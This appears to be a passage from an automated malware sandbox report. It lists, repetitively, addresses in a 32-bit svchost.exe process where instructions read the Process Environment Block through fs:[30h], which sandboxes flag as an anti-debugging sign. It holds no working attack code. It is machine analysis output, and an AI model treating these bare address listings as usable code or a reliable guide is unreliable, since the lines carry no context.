            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov ecx, dword ptr fs:[00000030h]1_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370625D mov eax, dword ptr fs:[00000030h]1_2_0370625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A250 mov eax, dword ptr fs:[00000030h]1_2_0362A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636259 mov eax, dword ptr fs:[00000030h]1_2_03636259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h]1_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h]1_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362823B mov eax, dword ptr fs:[00000030h]1_2_0362823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037062D6 mov eax, dword ptr fs:[00000030h]1_2_037062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov ecx, dword ptr fs:[00000030h]1_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704164 mov eax, dword ptr fs:[00000030h]1_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704164 mov eax, dword ptr fs:[00000030h]1_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov ecx, dword ptr fs:[00000030h]1_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C156 mov eax, dword ptr fs:[00000030h]1_2_0362C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C8158 mov eax, dword ptr fs:[00000030h]1_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660124 mov eax, dword ptr fs:[00000030h]1_2_03660124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov ecx, dword ptr fs:[00000030h]1_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F0115 mov eax, dword ptr fs:[00000030h]1_2_036F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037061E5 mov eax, dword ptr fs:[00000030h]1_2_037061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036601F8 mov eax, dword ptr fs:[00000030h]1_2_036601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]1_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]1_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03670185 mov eax, dword ptr fs:[00000030h]1_2_03670185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]1_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]1_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h]1_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h]1_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C073 mov eax, dword ptr fs:[00000030h]1_2_0365C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632050 mov eax, dword ptr fs:[00000030h]1_2_03632050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6050 mov eax, dword ptr fs:[00000030h]1_2_036B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A020 mov eax, dword ptr fs:[00000030h]1_2_0362A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C020 mov eax, dword ptr fs:[00000030h]1_2_0362C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6030 mov eax, dword ptr fs:[00000030h]1_2_036C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4000 mov ecx, dword ptr fs:[00000030h]1_2_036B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0362A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036380E9 mov eax, dword ptr fs:[00000030h]1_2_036380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B60E0 mov eax, dword ptr fs:[00000030h]1_2_036B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C0F0 mov eax, dword ptr fs:[00000030h]1_2_0362C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036720F0 mov ecx, dword ptr fs:[00000030h]1_2_036720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B20DE mov eax, dword ptr fs:[00000030h]1_2_036B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036280A0 mov eax, dword ptr fs:[00000030h]1_2_036280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C80A8 mov eax, dword ptr fs:[00000030h]1_2_036C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov eax, dword ptr fs:[00000030h]1_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov ecx, dword ptr fs:[00000030h]1_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363208A mov eax, dword ptr fs:[00000030h]1_2_0363208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638770 mov eax, dword ptr fs:[00000030h]1_2_03638770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov esi, dword ptr fs:[00000030h]1_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630750 mov eax, dword ptr fs:[00000030h]1_2_03630750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE75D mov eax, dword ptr fs:[00000030h]1_2_036BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4755 mov eax, dword ptr fs:[00000030h]1_2_036B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov ecx, dword ptr fs:[00000030h]1_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AC730 mov eax, dword ptr fs:[00000030h]1_2_036AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C700 mov eax, dword ptr fs:[00000030h]1_2_0366C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630710 mov eax, dword ptr fs:[00000030h]1_2_03630710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660710 mov eax, dword ptr fs:[00000030h]1_2_03660710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE7E1 mov eax, dword ptr fs:[00000030h]1_2_036BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C0 mov eax, dword ptr fs:[00000030h]1_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B07C3 mov eax, dword ptr fs:[00000030h]1_2_036B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036307AF mov eax, dword ptr fs:[00000030h]1_2_036307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E47A0 mov eax, dword ptr fs:[00000030h]1_2_036E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D678E mov eax, dword ptr fs:[00000030h]1_2_036D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03662674 mov eax, dword ptr fs:[00000030h]1_2_03662674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364C640 mov eax, dword ptr fs:[00000030h]1_2_0364C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E627 mov eax, dword ptr fs:[00000030h]1_2_0364E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03666620 mov eax, dword ptr fs:[00000030h]1_2_03666620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668620 mov eax, dword ptr fs:[00000030h]1_2_03668620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363262C mov eax, dword ptr fs:[00000030h]1_2_0363262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE609 mov eax, dword ptr fs:[00000030h]1_2_036AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672619 mov eax, dword ptr fs:[00000030h]1_2_03672619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A6C7 mov eax, dword ptr fs:[00000030h]1_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C6A6 mov eax, dword ptr fs:[00000030h]1_2_0366C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036666B0 mov eax, dword ptr fs:[00000030h]1_2_036666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634690 mov eax, dword ptr fs:[00000030h]1_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634690 mov eax, dword ptr fs:[00000030h]1_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638550 mov eax, dword ptr fs:[00000030h]1_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638550 mov eax, dword ptr fs:[00000030h]1_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6500 mov eax, dword ptr fs:[00000030h]1_2_036C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036325E0 mov eax, dword ptr fs:[00000030h]1_2_036325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h]1_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h]1_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h]1_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h]1_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036365D0 mov eax, dword ptr fs:[00000030h]1_2_036365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h]1_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h]1_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h]1_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h]1_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632582 mov eax, dword ptr fs:[00000030h]1_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632582 mov ecx, dword ptr fs:[00000030h]1_2_03632582
